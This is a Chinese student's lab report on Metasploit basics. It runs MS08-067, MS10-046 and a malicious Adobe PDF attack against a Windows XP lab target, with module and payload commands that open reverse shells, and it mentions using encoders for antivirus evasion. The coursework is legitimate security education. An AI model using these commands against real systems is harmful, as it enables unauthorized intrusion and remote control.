20145239杜文超《网络攻防》- MSF基础应用

20145239杜文超《网络攻防》- MSF基础应用

基础问题回答

1、用自己的话解释什么是exploit,payload,encode?

  • exploit:实现攻击行为的主体,但没有载荷只是一个空壳。没有子弹的枪是很好的比喻。
  • payload:载荷。一般指shellcode,攻击成功后需要运行的东西。
  • encode:编码器。使得我们的攻击中不会出现“坏字符”,也可以通过编码改变特征码,实现免杀。

实验总结与体会

msf仅仅是一个攻击平台,攻击具体的实现还是要靠抓住靶机上的漏洞进行。本次实验我对metasploit的体系结构有了初步的认识。尤其是对6个主要模块的功能和用途有了深入理解和实践经验。我也深刻的认识到在现实中想要真正攻陷一台靶机还是有难度的,因为本次实验我使用的靶机是win xp sp3英文版系统。很老,应该算是被淘汰的了,所以才会有那么多漏洞让我可以抓住去攻击,现在windows版本不断更新,漏洞补丁的更新速度也越来越快,因此更体现出了0 day漏洞的价值。

实验过程

实验环境配置

攻击机:Kali(IP:192.168.248.128)

靶机:Windows XP SP3(IP:192.168.248.129)

MS08_067漏洞渗透攻击

1、先用search ms08_067指令查询该攻击模块。

2、输入use exploit/windows/smb/ms08_067_netapi使用该模块,并用show payloads指令查看一下要用的payload。

3、输入set payload generic/shell_reverse_tcp设置一下payload,通过反向连接获取shell。

4、使用show options指令查看需要进行的配置。

5、如图所示进行配置,设置RHOST为远程靶机IP地址、LHOST为主机IP地址。

6、设置完成后再次确认刚才的设置。

7、输入exploit发起攻击。

8、攻击成功,成功获取靶机系统shell。

对浏览器攻击:ms10_046漏洞攻击

1、先利用search ms10_046指令查看可以运用的攻击模块.

 

2、使用该漏洞进行攻击。

3、设置相关参数。SRVHOST是本地监听主机的IP地址,LHOST是监听的IP地址,都填攻击者本机IP地址。

4、发起攻击,可以看到,生成了url链接地址。

5、我们使用靶机的IE浏览器登陆一下刚才生成的url地址。

6、发现主机这边已经攻击成功了。

7、使用命令sessions -i 1开始连接,成功得到shell。

对Adobe的漏洞攻击:adobe_pdf_embedded_exe

1、进入文件攻击目录选择一个合适的adobe漏洞。

2、我选择的是adobe_pdf_embedded_exe,use这个漏洞。

3、设置一下payload攻击有效载荷:set payload windows/meterpreter/reverse_tcp

4、show options查看需要进行哪些配置。

5、设置文件名称5239.pdf,LHOST为攻击者主机IP。

6、再次使用show options检查配置。

7、发起攻击。发现生成了一个名为5239的pdf文件。

8、把攻击主机设置为监听状态,方法和以前的实验类似。

9、将该pdf拷贝到靶机上然后打开。

10、攻击机已经成功获取到靶机shell。

辅助模块的应用:scanner/http/dir_listing

1、先用search了解一下有关scanner/http/dir_listing的相关信息。

2、设置相关参数。

3、run,运行成功。

原文地址:https://www.cnblogs.com/dwc929210354/p/6718883.html